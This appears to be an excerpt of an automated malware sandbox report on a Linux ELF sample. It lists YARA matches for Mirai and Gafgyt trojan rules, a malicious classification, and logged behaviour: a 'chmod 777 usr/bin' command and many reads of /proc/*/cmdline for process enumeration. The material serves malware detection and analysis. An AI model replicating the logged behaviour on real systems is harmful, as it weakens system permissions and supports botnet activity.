          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 5446.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 5432.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 5460.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: Process Memory Space: AFWaD3vnqR.elf PID: 5432, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: AFWaD3vnqR.elf PID: 5446, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: AFWaD3vnqR.elf PID: 5460, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.troj.linELF@0/0@0/0
          Source: /bin/sh (PID: 5437)Chmod directory: /usr/bin/chmod -> chmod 777 usr/binJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/5380/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/114/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/235/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/115/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/236/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/116/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/237/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/117/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/238/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/118/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/239/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/119/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/914/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/10/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/917/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/11/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/12/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/13/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/14/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/15/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/16/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/5277/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/17/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/18/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/19/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/240/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/3095/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/120/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/241/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/121/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/242/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/122/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/243/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/2/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/123/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/244/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/3/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/124/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/245/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1588/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/125/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/4/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/246/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/126/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/5/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/247/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/127/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/6/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/248/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/128/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/7/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/249/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/129/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/8/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/800/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/9/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1906/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/802/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/803/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/20/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/21/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/22/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/23/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/24/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/25/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/26/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/27/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/28/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/29/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/3420/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1482/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/490/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1480/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/250/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/371/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/130/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/251/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/131/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/252/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/132/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/253/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/254/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/1238/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/134/cmdlineJump to behavior
          Source: /tmp/AFWaD3vnqR.elf (PID: 5458)File opened: /proc/255/cmdlineJump to behavior
